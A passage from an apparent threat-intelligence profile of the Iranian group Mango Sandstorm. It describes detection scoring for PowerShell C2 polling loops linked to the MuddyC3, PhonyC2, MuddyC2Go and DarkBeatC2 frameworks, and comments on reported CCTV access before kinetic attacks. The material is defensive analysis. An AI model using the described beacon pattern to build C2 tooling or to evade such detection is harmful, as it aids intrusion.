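A one-off `Invoke-WebRequest` that downloads an installer scores 1 and a `foreach` over servers scores 0, while the polling loop scores 9 and is the only event reported. The threshold sits at the combination that matters (fetch, loop, sleep, dynamic execution) rather than on the `SRT_` string alone, because the string is specific to one framework generation and the loop shape is what carried across MuddyC3, PhonyC2, MuddyC2Go and DarkBeatC2. Script blocks assembled at runtime only reach this logic if Script Block Logging is on, which is the point of the control above.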
analyst note — CCTV access and kinetic operation timing

Amazon Threat Intelligence's November 2024 disclosure that Mango Sandstorm accessed compromised CCTV servers at locations in Israel and the Red Sea prior to attacks in those areas is among the more significant findings in recent Iranian APT reporting. While Amazon carefully noted the correlation rather than asserting a proven causal link, the documented temporal pattern — MOIS-linked operators accessing physical surveillance feeds at locations that were subsequently subject to kinetic attacks — raises documented questions about whether MOIS cyber operations include providing situational awareness support to Iranian military forces or proxy groups planning physical operations. If this assessment is accurate, it represents a meaningful expansion of what MOIS cyber capabilities are being used for: not only intelligence collection and espionage, but potentially tactical intelligence support for kinetic military planning.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile